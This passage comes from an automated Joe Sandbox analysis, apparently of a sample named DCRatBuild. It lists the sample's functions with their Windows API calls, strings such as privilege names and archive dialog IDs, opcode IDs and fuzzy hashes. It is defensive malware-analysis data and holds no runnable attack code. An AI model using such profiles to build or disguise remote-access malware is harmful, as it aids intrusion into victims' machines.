                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Time$File$System$Local$SpecificVersion
                                        • String ID:
                                        • API String ID: 2092733347-0
                                        • Opcode ID: 59510722a6511a1954045955ea0b816948c0c11b99495b760c318a854f8e9410
                                        • Instruction ID: cb63465b60d3139d3821ba98d10e3e47d4cfc49af102a9cabd509fd394d31243
                                        • Opcode Fuzzy Hash: 59510722a6511a1954045955ea0b816948c0c11b99495b760c318a854f8e9410
                                        • Instruction Fuzzy Hash: 8131EA7A90020AEBCB00DFE5C8859EFFBBDFF58700B04455AE955E7210E7349645CB68
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: _memcmp
                                        • String ID:
                                        • API String ID: 2931989736-0
                                        • Opcode ID: a05fbd2e07afff9de562b354a90c0abe122a2da3a09e94abc07a326d690517f0
                                        • Instruction ID: b15c3cede02193444221b2d9606ab89db15b78be970ebcb4d40e39644cbdc835
                                        • Opcode Fuzzy Hash: a05fbd2e07afff9de562b354a90c0abe122a2da3a09e94abc07a326d690517f0
                                        • Instruction Fuzzy Hash: 592192B1B4020EBBD7049E11CC81E2B77ADBB50788F108628FD0A9B205E3B8ED4196A1
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0074D2F2
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0074D30C
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0074D31D
                                        • TranslateMessage.USER32(?), ref: 0074D327
                                        • DispatchMessageW.USER32(?), ref: 0074D331
                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0074D33C
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                        • String ID:
                                        • API String ID: 2148572870-0
                                        • Opcode ID: c30d8051379c4612fe49e11d1c25292728b4e23de7ec057a1b52c85cb8180d83
                                        • Instruction ID: cfb03354588987e311b10f598d63f8095c82a39637dd3fa7e1d30fa3951cabca
                                        • Opcode Fuzzy Hash: c30d8051379c4612fe49e11d1c25292728b4e23de7ec057a1b52c85cb8180d83
                                        • Instruction Fuzzy Hash: 13F03C72A0121DBBCB206FA5DC4CEDBBF6EEF51391F008112F646D2011D6788952C7B5
                                        APIs
                                        • _wcschr.LIBVCRUNTIME ref: 0074C435
                                          • Part of subcall function 007417AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0073BB05,00000000,.exe,?,?,00000800,?,?,007485DF,?), ref: 007417C2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: CompareString_wcschr
                                        • String ID: <$HIDE$MAX$MIN
                                        • API String ID: 2548945186-3358265660
                                        • Opcode ID: 602ff28e0254e97572e09ef864b5eda0d39692f6372595fa9c9a0a2d3c9f634d
                                        • Instruction ID: 7dc0b932a41731165ec005f5b2910a33df6750d24f40bc6fb84b205044be54a2
                                        • Opcode Fuzzy Hash: 602ff28e0254e97572e09ef864b5eda0d39692f6372595fa9c9a0a2d3c9f634d
                                        • Instruction Fuzzy Hash: B2319472A00249AADF62DA54CC55FEA7BBCEB54310F004066FA05D6090EBB99FC4CA50
                                        APIs
                                          • Part of subcall function 0073130B: GetDlgItem.USER32(00000000,00003021), ref: 0073134F
                                          • Part of subcall function 0073130B: SetWindowTextW.USER32(00000000,007635B4), ref: 00731365
                                        • EndDialog.USER32(?,00000001), ref: 0074A9DE
                                        • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0074A9F6
                                        • SetDlgItemTextW.USER32(?,00000067,?), ref: 0074AA24
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ItemText$DialogWindow
                                        • String ID: GETPASSWORD1$xjx
                                        • API String ID: 445417207-132524196
                                        • Opcode ID: 3459561eefa3d0283295f997f48673655bf6871c382f9bc5996713bf9d933cc9
                                        • Instruction ID: 721be1e4578ef189740b97c907c240fb01184e4431e2174a7203ea404210649f
                                        • Opcode Fuzzy Hash: 3459561eefa3d0283295f997f48673655bf6871c382f9bc5996713bf9d933cc9
                                        • Instruction Fuzzy Hash: 2D110833A80118BADB21AA649D09FFB376CEB49700F004021FA45B21D1C37D9956D772
                                        APIs
                                        • LoadBitmapW.USER32(00000065), ref: 0074ADFD
                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 0074AE22
                                        • DeleteObject.GDI32(00000000), ref: 0074AE54
                                        • DeleteObject.GDI32(00000000), ref: 0074AE77
                                          • Part of subcall function 00749E1C: FindResourceW.KERNEL32(0074AE4D,PNG,?,?,?,0074AE4D,00000066), ref: 00749E2E
                                          • Part of subcall function 00749E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0074AE4D,00000066), ref: 00749E46
                                          • Part of subcall function 00749E1C: LoadResource.KERNEL32(00000000,?,?,?,0074AE4D,00000066), ref: 00749E59
                                          • Part of subcall function 00749E1C: LockResource.KERNEL32(00000000,?,?,?,0074AE4D,00000066), ref: 00749E64
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                        • String ID: ]
                                        • API String ID: 142272564-3352871620
                                        • Opcode ID: dff7a2dc3dac03b3ea16d7e89f76452e026bd0e9cfb96430e9d290c6e9109382
                                        • Instruction ID: 3a0b2fbd4555822695920cddb217404a2eeaf68352bf07804b38873e08f3bc44
                                        • Opcode Fuzzy Hash: dff7a2dc3dac03b3ea16d7e89f76452e026bd0e9cfb96430e9d290c6e9109382
                                        • Instruction Fuzzy Hash: 9A01F932980225F7C71077689C0BA7F7B79AF81B51F094115FE10A7292DF7D8C1696B1
                                        APIs
                                          • Part of subcall function 0073130B: GetDlgItem.USER32(00000000,00003021), ref: 0073134F
                                          • Part of subcall function 0073130B: SetWindowTextW.USER32(00000000,007635B4), ref: 00731365
                                        • EndDialog.USER32(?,00000001), ref: 0074CCDB
                                        • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0074CCF1
                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 0074CD05
                                        • SetDlgItemTextW.USER32(?,00000068), ref: 0074CD14
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ItemText$DialogWindow
                                        • String ID: RENAMEDLG
                                        • API String ID: 445417207-3299779563
                                        • Opcode ID: 0aab8f71b2c82756b05824443220272981868aad3bd4f8b997ac226cfefa6d21
                                        • Instruction ID: 61a92ffe14298ff47fb8afbe59509e67e945238ef292752bacc1b807c754ff74
                                        • Opcode Fuzzy Hash: 0aab8f71b2c82756b05824443220272981868aad3bd4f8b997ac226cfefa6d21
                                        • Instruction Fuzzy Hash: 050147327C63107FD6625F689C49F673B6CEB5A702F208421F346A20E1CBAD5906CB79
                                        APIs
                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 0075251A
                                          • Part of subcall function 00752B52: ___AdjustPointer.LIBCMT ref: 00752B9C
                                        • _UnwindNestedFrames.LIBCMT ref: 00752531
                                        • ___FrameUnwindToState.LIBVCRUNTIME ref: 00752543
                                        • CallCatchBlock.LIBVCRUNTIME ref: 00752567
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                        • String ID: /)u
                                        • API String ID: 2633735394-2826551959
                                        • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                        • Instruction ID: d4ac28fb97134b479044220d8921f8580edcfedeec5c368846f5a5a0dd8b8295
                                        • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                        • Instruction Fuzzy Hash: 6A012932000108FBCF129F65CC45EDA3BBAEF5A751F058054FD1866122D3BAE976EBA1
                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00757573,00000000,?,00757513,00000000,0076BAD8,0000000C,0075766A,00000000,00000002), ref: 007575E2
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 007575F5
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00757573,00000000,?,00757513,00000000,0076BAD8,0000000C,0075766A,00000000,00000002), ref: 00757618
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: cbb692d54b250837a28a7868cad212abd2a50feabcbfdefc4575b3f2b525af52
                                        • Instruction ID: 50702928724ae01fdd9c01f2f1b78a7c29853b313d41480c6ab5ebd7385a3910
                                        • Opcode Fuzzy Hash: cbb692d54b250837a28a7868cad212abd2a50feabcbfdefc4575b3f2b525af52
                                        • Instruction Fuzzy Hash: 06F04F70A0861CBBDB159B94DC09BDDBFB9EF04712F048168FC06A2160DBB88A44DB98
                                        APIs
                                          • Part of subcall function 00740085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007400A0
                                          • Part of subcall function 00740085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0073EB86,Crypt32.dll,00000000,0073EC0A,?,?,0073EBEC,?,?,?), ref: 007400C2
                                        • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0073EB92
                                        • GetProcAddress.KERNEL32(007781C0,CryptUnprotectMemory), ref: 0073EBA2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AddressProc$DirectoryLibraryLoadSystem
                                        • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                        • API String ID: 2141747552-1753850145
                                        • Opcode ID: 76e5649b6f5609f5fc2cfbffff7471a90c6118f993005ae09b206d835d26a3ff
                                        • Instruction ID: d40f1ec3d0bb3f861eb330400990ceb4b0711de5389f682deecc5cd3d0e93f5c
                                        • Opcode Fuzzy Hash: 76e5649b6f5609f5fc2cfbffff7471a90c6118f993005ae09b206d835d26a3ff
                                        • Instruction Fuzzy Hash: 14E046B0800741AEDB229F389808B42FAE4AF14708F04C81DE8D7E3291DAFCE584CF60
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: e8b1bc1ebf0b31835e649fd48807a18490486b74d9cbbb6350113da6a4116fa2
                                        • Instruction ID: 8ee34e066df4d45565f2def854ee7be621f1c756b0676fb0847766935801a447
                                        • Opcode Fuzzy Hash: e8b1bc1ebf0b31835e649fd48807a18490486b74d9cbbb6350113da6a4116fa2
                                        • Instruction Fuzzy Hash: 5E410232A00304DFCB24DF78D885A9EB7B5EF85724F1585A8E905EB281DB74AD05CB80
                                        APIs
                                        • GetEnvironmentStringsW.KERNEL32 ref: 0075B619
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0075B63C
                                          • Part of subcall function 00758518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0075C13D,00000000,?,007567E2,?,00000008,?,007589AD,?,?,?), ref: 0075854A
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0075B662
                                        • _free.LIBCMT ref: 0075B675
                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0075B684
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                        • String ID:
                                        • API String ID: 336800556-0
                                        • Opcode ID: 7506dadb8cdb7bc2c65e2caae432f152671818c2915189bce7e9729e92c2f8d1
                                        • Instruction ID: 196a336f7a8ab345ffef3954befc7831ee8c21e6d13ddcc9a5eb14978f2c1db2
                                        • Opcode Fuzzy Hash: 7506dadb8cdb7bc2c65e2caae432f152671818c2915189bce7e9729e92c2f8d1
                                        • Instruction Fuzzy Hash: CE01B162601615BF63211A766C8DCBB6A6DEAC7BA23144228FC05D2110EFE88D05C1B0
                                        APIs
                                          • Part of subcall function 00740A41: ResetEvent.KERNEL32(?), ref: 00740A53
                                          • Part of subcall function 00740A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00740A67
                                        • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 0074078F
                                        • CloseHandle.KERNEL32(?,?), ref: 007407A9
                                        • DeleteCriticalSection.KERNEL32(?), ref: 007407C2
                                        • CloseHandle.KERNEL32(?), ref: 007407CE
                                        • CloseHandle.KERNEL32(?), ref: 007407DA
                                          • Part of subcall function 0074084E: WaitForSingleObject.KERNEL32(?,000000FF,00740A78,?), ref: 00740854
                                          • Part of subcall function 0074084E: GetLastError.KERNEL32(?), ref: 00740860
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                        • String ID:
                                        • API String ID: 1868215902-0
                                        • Opcode ID: 10f49f0e1c5f59b2301afdee7e6ef0d6ee622af64d49192709cc3ce4ca4768f2
                                        • Instruction ID: e5bc575b0d4866d009b04b5cdd7db49bf76174bb08009600287a11487b224411
                                        • Opcode Fuzzy Hash: 10f49f0e1c5f59b2301afdee7e6ef0d6ee622af64d49192709cc3ce4ca4768f2
                                        • Instruction Fuzzy Hash: FE01B571540704EFCB229B65DD88FC6BBFEFB48710F004519F25B42160DBB96A48CB94
                                        APIs
                                        • _free.LIBCMT ref: 0075BF28
                                          • Part of subcall function 007584DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0075BFA7,?,00000000,?,00000000,?,0075BFCE,?,00000007,?,?,0075C3CB,?), ref: 007584F4
                                          • Part of subcall function 007584DE: GetLastError.KERNEL32(?,?,0075BFA7,?,00000000,?,00000000,?,0075BFCE,?,00000007,?,?,0075C3CB,?,?), ref: 00758506
                                        • _free.LIBCMT ref: 0075BF3A
                                        • _free.LIBCMT ref: 0075BF4C
                                        • _free.LIBCMT ref: 0075BF5E
                                        • _free.LIBCMT ref: 0075BF70
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: a78d5fcfc27b23ec7fdbb8119cb533a3f2e0819eaea7a7ee70d675b1f92e8c1a
                                        • Instruction ID: 73f646594cefc3081e7740f175f6487dc999d9158c60dc200048affeaaa5dbf0
                                        • Opcode Fuzzy Hash: a78d5fcfc27b23ec7fdbb8119cb533a3f2e0819eaea7a7ee70d675b1f92e8c1a
                                        • Instruction Fuzzy Hash: 51F06832605340E786E0DF54EDC9DA773D9BA00351354C805FC49D7950CBBCFC454A65
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00737579
                                          • Part of subcall function 00733B3D: __EH_prolog.LIBCMT ref: 00733B42
                                        • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00737640
                                          • Part of subcall function 00737BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00737C04
                                          • Part of subcall function 00737BF5: GetLastError.KERNEL32 ref: 00737C4A
                                          • Part of subcall function 00737BF5: CloseHandle.KERNEL32(?), ref: 00737C59
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                        • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                        • API String ID: 3813983858-639343689
                                        • Opcode ID: caf83b44192d2b60562fc81c434694b6aba2f98b8e534dcf188863dbb97041a8
                                        • Instruction ID: 30bcb57217130bf9836a6d35bc086ba491079944d2d8673c096b543931e5d12d
                                        • Opcode Fuzzy Hash: caf83b44192d2b60562fc81c434694b6aba2f98b8e534dcf188863dbb97041a8
                                        • Instruction Fuzzy Hash: 2031C1B1908248EEEF24EB68DC4AFEEBB79AF15354F004059F449A7153DBBC4A44C7A0
                                        APIs
                                          • Part of subcall function 0073130B: GetDlgItem.USER32(00000000,00003021), ref: 0073134F
                                          • Part of subcall function 0073130B: SetWindowTextW.USER32(00000000,007635B4), ref: 00731365
                                        • EndDialog.USER32(?,00000001), ref: 0074A4B8
                                        • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0074A4CD
                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 0074A4E2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ItemText$DialogWindow
                                        • String ID: ASKNEXTVOL
                                        • API String ID: 445417207-3402441367
                                        • Opcode ID: decc2f1c897d7eaf378fa89fd14fc393dd09fdd4c7c2550ffcf4e721b09cbfb4
                                        • Instruction ID: 76f26e7ee486be35c78e6a9955efc89fdf2b869ca4b69c6a2f97e9b406a362c7
